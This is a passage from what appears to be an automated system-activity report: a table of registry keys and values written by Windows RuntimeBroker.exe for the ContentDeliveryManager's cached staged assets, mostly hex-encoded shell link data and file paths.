| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6f46c3e3-6e97-4c9d = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e8b0e8db-6770-41ff = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e8b0e8db-6770-41ff = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000b9293bd712b1da019bda44e012b1da019bda44e012b1da01e27c09000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bc58cc7a2000373939386434623438653766636533376565333664363862663062346438646631363831643562616361393530633662663138313865633633393037646463360000b20009000400efbebc58cc7abc58cc7a2e00000000000000000000000000000000000000000000000000c4975b00370039003900380064003400620034003800650037006600630065003300370065006500330036006400360038006200660030006200340064003800640066003100360038003100640035006200610063006100390035003000630036006200660031003800310038006500630036003300390030003700640064006300360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000ef5ba4b31000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37393938643462343865376663653337656533366436386266306234643864663136383164356261636139353063366266313831386563363339303764646336000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006f626a6979756965000000000000000096f7560095bce14897a93e3da1d528bc135f531c3a0def119519f20c5df75bb096f7560095bce14897a93e3da1d528bc135f531c3a0def119519f20c5df75bb0d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0034003100320034003900300030003500350031002d0034003000360038003400370036003000360037002d0033003400390031003200310032003500330033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000003f3ccc8c000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0211edf0-be10-43df | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0211edf0-be10-43df = 2ae6e1e012b1da01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0211edf0-be10-43df = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6f46c3e3-6e97-4c9d | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2c6a55f5-2b06-4dc9 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2c6a55f5-2b06-4dc9 = "\\\\?\\Volume{8CCC3C3F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\48bc7b06ea8322cd6af81d6a4508f3373b9b8b813bc998d6a224ceabe13c9f9a" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b3d6b47d-7ba4-4533 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\30befe0e-8ea2-4e21 = "\\\\?\\Volume{8CCC3C3F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\58ef1de56d2dca62a430c4bb683322e09825d22a9d93a4282c21e7ca9807eedc" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a337333d-6dda-4912 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b3d6b47d-7ba4-4533 = 5a45fbd612b1da01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e8b0e8db-6770-41ff = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13a82c23-3b63-4f9a | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b3d6b47d-7ba4-4533 = "\\\\?\\Volume{8CCC3C3F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7ed11556e0761b6e0764bdb39a077fcd9fbaaa63ca46e07b80b5f5faa4d595c4" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6f46c3e3-6e97-4c9d | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6f46c3e3-6e97-4c9d = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13a82c23-3b63-4f9a | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0211edf0-be10-43df | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13a82c23-3b63-4f9a = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000036483fd712b1da01b18b24e112b1da01b18b24e112b1da013f110a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bc58cc7a2000343862633762303665613833323263643661663831643661343530386633333733623962386238313362633939386436613232346365616265313363396639610000b20009000400efbebc58cc7abc58cc7a2e0000000000000000000000000000000000000000000000000004445400340038006200630037006200300036006500610038003300320032006300640036006100660038003100640036006100340035003000380066003300330037003300620039006200380062003800310033006200630039003900380064003600610032003200340063006500610062006500310033006300390066003900610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000ef5ba4b31000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34386263376230366561383332326364366166383164366134353038663333373362396238623831336263393938643661323234636561626531336339663961000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006f626a6979756965000000000000000096f7560095bce14897a93e3da1d528bc175f531c3a0def119519f20c5df75bb096f7560095bce14897a93e3da1d528bc175f531c3a0def119519f20c5df75bb0d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0034003100320034003900300030003500350031002d0034003000360038003400370036003000360037002d0033003400390031003200310032003500330033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000003f3ccc8c000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b3d6b47d-7ba4-4533 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b3d6b47d-7ba4-4533 = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000005731f6d612b1da015731f6d612b1da015731f6d612b1da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bc58cc7a2000376564313135353665303736316236653037363462646233396130373766636439666261616136336361343665303762383062356635666161346435393563340000b20009000400efbebc58cc7abc58cc7a2e00000000000000000000000000000000000000000000000000a9c64e00370065006400310031003500350036006500300037003600310062003600650030003700360034006200640062003300390061003000370037006600630064003900660062006100610061003600330063006100340036006500300037006200380030006200350066003500660061006100340064003500390035006300340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000ef5ba4b31000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37656431313535366530373631623665303736346264623339613037376663643966626161613633636134366530376238306235663566616134643539356334000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006f626a6979756965000000000000000096f7560095bce14897a93e3da1d528bc015f531c3a0def119519f20c5df75bb096f7560095bce14897a93e3da1d528bc015f531c3a0def119519f20c5df75bb0d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0034003100320034003900300030003500350031002d0034003000360038003400370036003000360037002d0033003400390031003200310032003500330033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000003f3ccc8c000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e8b0e8db-6770-41ff | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a337333d-6dda-4912 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a337333d-6dda-4912 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a337333d-6dda-4912 = "\\\\?\\Volume{8CCC3C3F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7998d4b48e7fce37ee36d68bf0b4d8df1681d5baca950c6bf1818ec63907ddc6" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2c6a55f5-2b06-4dc9 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2c6a55f5-2b06-4dc9 = c5f0f4d612b1da01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2c6a55f5-2b06-4dc9 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\30befe0e-8ea2-4e21 = dcf77de112b1da01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\30befe0e-8ea2-4e21 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13a82c23-3b63-4f9a = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\30befe0e-8ea2-4e21 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b3d6b47d-7ba4-4533 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a337333d-6dda-4912 = d929eed612b1da01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e8b0e8db-6770-41ff = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0211edf0-be10-43df = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000001ac532d712b1da018cdccfe012b1da018cdccfe012b1da01e27a08000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bc58cc7a2000376564313135353665303736316236653037363462646233396130373766636439666261616136336361343665303762383062356635666161346435393563340000b20009000400efbebc58cc7abc58cc7a2e00000000000000000000000000000000000000000000000000a9c64e00370065006400310031003500350036006500300037003600310062003600650030003700360034006200640062003300390061003000370037006600630064003900660062006100610061003600330063006100340036006500300037006200380030006200350066003500660061006100340064003500390035006300340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000ef5ba4b31000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37656431313535366530373631623665303736346264623339613037376663643966626161613633636134366530376238306235663566616134643539356334000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006f626a6979756965000000000000000096f7560095bce14897a93e3da1d528bc155f531c3a0def119519f20c5df75bb096f7560095bce14897a93e3da1d528bc155f531c3a0def119519f20c5df75bb0d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0034003100320034003900300030003500350031002d0034003000360038003400370036003000360037002d0033003400390031003200310032003500330033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000003f3ccc8c000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13a82c23-3b63-4f9a = 899935e112b1da01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
